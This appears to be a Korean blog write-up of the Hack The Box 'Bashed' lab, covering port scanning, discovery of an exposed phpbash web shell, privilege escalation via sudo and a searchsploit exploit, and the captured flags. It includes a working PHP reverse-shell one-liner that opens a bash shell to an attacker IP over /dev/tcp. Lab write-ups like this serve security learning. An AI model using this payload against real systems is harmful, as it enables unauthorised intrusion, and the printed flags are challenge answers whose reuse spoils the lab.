ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [HTB] Bashed Writeup
    Wargame/Hack The Box 2022. 1. 6. 23:36

    포트 스캐닝을 통해 대상 머신에 대한 정보를 수집해보자.

    nmap -sC -sS -sV -O -p- 10.129.171.147

     

    80포트만 열려있어서 접속해보니 아래와같은 페이지가 나타났다.

     

    서버 버전 정보는 아래와 같았고,

    phpbash라는것에 대한 소개 외 별 기능이 없는거 같아 dirb를 활용해서 탐색해보았다.

    dirb http://10.129.172.10

    /dev 경로가 흥미로워서 접속해보니 phpbash.php 라는 파일이 있었고,

    phpbash.php 기능 자체가 쉘을 제공하는것이다보니 user.txt 를 쉽게 얻을 수 있었다.

    하지만 root 계정 권한이 아니었기 때문에 권한 상승 작업이 필요했다.

    위 OS 버전에 따른 권한 상승을 시도해봤다. 여러 exploit 코드 중 44298.c(searchsploit) 을 활용하기로 했다.

    다만, 현재 쉘은 온전치않기때문에 php reverse shellcode를 업로드하여 reverseshell을 획득한 후 진행하기로 했다.

    아래 코드로 rs.php를 만들고, phpbash에서 wget명령어를 통해 /var/www/html/uploads/ 에 해당 코드 업로드 후 실행시켰다.

    <?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/1234 0>&1'"); ?>

     

     

    sudo -l

    www-data계정에서 exploit 코드 실행이 가능한 사용자로 전환하기 위해 위 명령어를 통해 scriptmanager 계정에 접근 가능함을 확인했고

     

    sudo -i -u scriptmanager

    명령어를 통해 scriptmanager 로 전환, exploit 코드를 실행시켜 루트권한을 획득 할 수 있었다.

     

     

    FLAG = 

    [user] 2c281f318555dbc1b856957c7147bfc1

    [root] cc4f0afe3a1026d402ba10329674a8e2

    반응형

    'Wargame > Hack The Box' 카테고리의 다른 글

    [HTB] Optimum Writeup  (0) 2022.01.11
    [HTB] Shocker Writeup  (0) 2022.01.08
    [HTB] Blue Writeup  (0) 2022.01.07
    [HTB] legacy Writeup  (0) 2022.01.05
    [HTB] Lame Writeup  (0) 2022.01.05

    댓글

Designed by Tistory.